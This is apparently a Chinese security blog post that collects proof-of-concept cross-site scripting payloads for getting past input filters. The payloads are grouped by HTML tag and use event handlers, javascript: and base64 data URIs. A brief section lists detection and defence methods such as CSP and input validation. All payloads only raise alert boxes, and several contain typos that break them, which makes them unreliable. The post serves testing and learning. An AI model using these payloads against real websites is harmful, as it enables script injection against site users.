常用xss绕过学习及poc,2

最新推荐文章于 2023-11-09 22:14:10 发布
最新推荐文章于 2023-11-09 22:14:10 发布
阅读量921 收藏 4
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38122566/article/details/103859149
版权

常见标签

 

<scirpt>标签

<scirpt>alert("xss");</script>

<img>标签

<img src=javascript:alert("xss")><IMG SRC=javascript:alert(String.formCharCode(88,83,83))><img scr="URL" style='Xss:expression(alert(/xss));'<img STYLE="background-image:url(javascript:alert('XSS'))"><img src="x" onerror=alert('xss')><img src="1" onerror=eval("alert('xss')")><img src=1 onmouseover=alert('xss')>

<a>标签

<a href="javascript:alert('xss')">aa</a><a href=javascript:eval(alert('xss'))>aa</a><a href="javascript:aaa" onmouseover="alert(/xss/)">a</a><a href="" onclick=alert('xss')>aa</a><a href="" onclick=eval(alert('xss'))>aa</a><a href=kycg.asp?ttt=1000 onmouseover=prompt('xss') y=2016>aa</a>

<input>标签

<input value="" onclick=alert('xss') type="text"><input onfocus="alert('xss');"><input name="name" value="" onmouseover=prompt('xss') bad=""><input onblur=alert("xss") autofocus><input autofocus><input onfocus="alert('xss');" autofocus><input name="name" value=""><script>alert('xss')</script>

<form>标签

<form action=javascript:alert('xss') method="get"><form action=javascript:alert('xss')><form method=post action=aa.asp? onmouseover=prompt('xss')><form method=post action=aa.asp? onmouseover=alert('xss')><form action=1 onmouseover=alert('xss)><form method=post action="data:text/html;base64,<script>alert('xss')</script>"><form method=post action="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

<details>

<details ontoggle="alert('xss');"><details open ontoggle="alert('xss');">

<svg>

<svg onload=alert("xss");>

<select>

<select onfocus=alert(1)></select><select onfocus=alert(1) autofocus>

<iframe>标签

<iframe onload=alert("xss");></iframe><iframe src=javascript:alert('xss');height=5width=1000 /><iframe><iframe src="data:text/html,&lt;script&gt;alert('xss')&lt;/script&gt;"></iframe><iframe src="data:text/html;base64,<script>alert('xss')</script>"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="><iframe src="aaa" onmouseover=alert('xss') /><iframe><iframe src="javascript&colon;prompt&lpar;`xss`&rpar;"></iframe>

<svg>标签

<svg onload=alert(1)>

<video>

<video><source onerror="alert(1)">

<audio>

<audio src=x onerror=alert("xss");>

<body>

<body/onload=alert("xss");><body onscroll=alert("xss");><br><br><br><br>

<textarea>

<textarea onfocus=alert("xss"); autofocus>

<keygen>

<keygen autofocus onfocus=alert(1)>

<marquee>

<marquee onstart=alert("xss")></marquee>

<isindex>

<isindex type=image src=1 onerror=alert("xss")>

expression属性

<img style="xss:expression(alert('xss''))"> <div style="color:rgb(''x:expression(alert(1))"></div><style>#test{x:expression(alert(/XSS/))}</style>

background属性

<table background=javascript:alert(1)></table>

 

 

检测XSS的办法

 

  1. 内容安全策略(CSP):内容安全策略是一种安全标准,用于防止XSS、点击劫持攻击和其他类型的弹出式攻击,这些攻击是在网页内容中执行恶意内容的结果。它是W3C工作组关于现代web浏览器支持的web应用程序安全性的建议。

    使用这种方法,开发人员必须声明浏览器将上载到其网站的内容的批准来源,例如,JavaScript、CSS、HTML框架、字体、图像、可嵌入对象(如Java、ActiveX、音频和视频文件)和其他HTML5特性

 

 

  1. 输入文本验证:此方法是防御XSS攻击的更常见类型。这种对不可靠的文本条目的处理是通过模块的编程来过滤和分析文本的

     

  2. 库或框架:包括微软的反XSS库,这是一个免费开放的集合,收集了开发人员构建一个名为OWASP ESAPI和ApacheWicket的安全web应用程序所需的所有安全方法

     

  3. XSSer:也称为跨站“脚本”,是一个用于检测和利用XSS漏洞的自动Web测试框架工具,它包含几个试图绕过某些过滤器的选项和一些代码注入的特殊技术。它是由OWASP开发的一种开源项目XSS

 

wi1s0n
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
xss poc
cnbird's blog
03-15 764
Ajax Worm - Proof of Concept http://myappsecurity.blogspot.com/2006/12/ajax-worm-proof-of-concept.html Ajax Sniffer - Prrof of concept http://myappsecurity.blogspot.com/2007/01/ajax-sniffer-pr
XSS触发语句小结
7Riven's blog
01-01 2040
一、标准语句 <script>alert(/XSS/)</script> 二、尝试大小写 <sCript>alert(1)</scRipt> 三、使用<img>标签 1、windows事件 <img src="x" onerror=alert(1)> <img src="1" onerror=eval("...
XSS POC
qq_43616736的博客
07-28 1944
xss xss 作为owasp top 10 之一, xss 被称为跨站脚本攻击 xss 危害: 1.盗取各种用户帐号 2.窃取用户cookie资料,冒充用户身份进入网站 3.劫持用户会话,执行任意操作 4.刷流量,执行弹窗广告 5.传播蠕虫病毒 xss漏洞发生在 ...
XSS绕过常见方式
tomyyyyy
08-12 401
XSS绕过常见方式 转载自https://www.cnblogs.com/bingtang123/p/12844659.html XSS常见方式 1.<script>alert(1)</script> 2.源码第一个,[<]被转义,因此在第二个里 "><script>alert(1)</script><a class=" 3....
xss漏洞的poc与exp
zhangge3663的博客
04-13 1480
POC <script>alert('xss')</script> 最简单常用poc "><script>alert(1)<script> <a href=" onclick=alert('xss')>type</a> 页面出现一个按钮type,点击触发onclick,然后执行弹窗。 <img src=http://1.1.1.1/a.jpg onerror=alert('xss')> 加载图片,给...
XSS绕过技术
10-11
Cross-Site Scripting(XSS绕过技术,来自论坛:法克论坛,作者:bystand
XSSBypass:XSS绕过技术
05-17
2. **XSS过滤器与绕过** - Web应用程序通常会使用过滤器来防止XSS攻击,但这些过滤器可能有漏洞或不够完善。攻击者可以通过编码、字符集转换、使用特殊字符、或者利用过滤器的逻辑漏洞来绕过防御。 - 例如,使用...
记录几种XSS绕过方式1
08-03
2. 大小写绕过: 如果过滤规则未考虑大小写,攻击者可以将敏感关键字如`onerror`或`script`改写为大写或小写,如`<ScRiPt>alert(1)</ScRiPt>`,或者`(1)>`,以此来规避过滤。 3. 进制代替: 在JSON等数据格式中,...
第04篇:XSS三重URL编码绕过实例1
08-03
0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双引号,看看输出:如图,可以看到,双引号被转义了,这时候是不是有种想放弃的想法,抱着尝试的状
第十二节 XSS 过滤器绕过-01
09-15
XSS 过滤器绕过技术详解 XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的 Web 应用程序安全漏洞,攻击者可以通过插入恶意脚本来盗取用户信息、破坏网站操作等。为防止 XSS 攻击,开发者通常会使用 XSS 过滤...
由于IE对URL编码问题处理不当带来的XSSPoC
公众号shadow sock7
06-11 1028
参考: https://web.archive.org/web/20131107024350/http://blackfan.ru/SourceRequestURI: <%= request.getRequestURI() %> Host: <%= request.getServerName() %> Port: <%= request.getLocalPort() %>PoC (all ve
XSS漏洞的poc与exp
bamanju0574的博客
09-01 888
poc <script>alert('xss')</script> 最简单常用poc <a href='' onclick=alert('xss')>type</a> 页面出现一个按钮type,点击触发onclick,然后执行弹窗 <img src=http://1.1.1.1/a.ipg onerror=alert('...
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 5421
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
【精选】【XSS漏洞03】XSS漏洞验证、语句构造与绕过方法
最新发布
qq_53058639的博客
11-09 369
了解漏洞验证相关概念含义;掌握XSS漏洞验证的方法;掌握XSS语句构造的5种方法;掌握XSS语句绕过的8种方法。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。
XSS漏洞-常见标签
weixin_61143354的博客
09-17 1579
网络安全笔记
XSS专栏之常见xss--总结备忘
键盘的起始页
02-25 1013
开始总结一些xss的想法。
xss(跨站攻击)
m0_74456293的博客
03-20 2529
xss(跨站攻击)
XSS之冷门事件
不知名白帽的博客
06-29 668
XSS之冷门事件
XSS跨站脚本攻击(内含poc)----自用笔记
weixin_59114667的博客
02-22 280
仅仅是自已用,无别的想法(doge)
XSS绕过方式有哪些
10-27
XSS(跨站脚本攻击)是一种常见的Web攻击方式,攻击者通过注入恶意脚本来窃取用户信息或者执行其他恶意操作。以下是一些XSS绕过方式: 1. HTML编码绕过:攻击者可以使用HTML编码来绕过过滤器,例如使用<代替<,使用>代替>等。 2. JavaScript编码绕过:攻击者可以使用JavaScript编码来绕过过滤器,例如使用%3C代替<,使用%3E代替>等。 3. 事件属性绕过:攻击者可以使用事件属性来绕过过滤器,例如使用onload、onerror等事件属性来执行恶意脚本。 4. 标签闭合绕过:攻击者可以使用标签闭合来绕过过滤器,例如使用<img src="x" onerror="alert('xss')" />来执行恶意脚本。 5. DOM操作绕过:攻击者可以使用DOM操作来绕过过滤器,例如使用document.write()来插入恶意脚本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值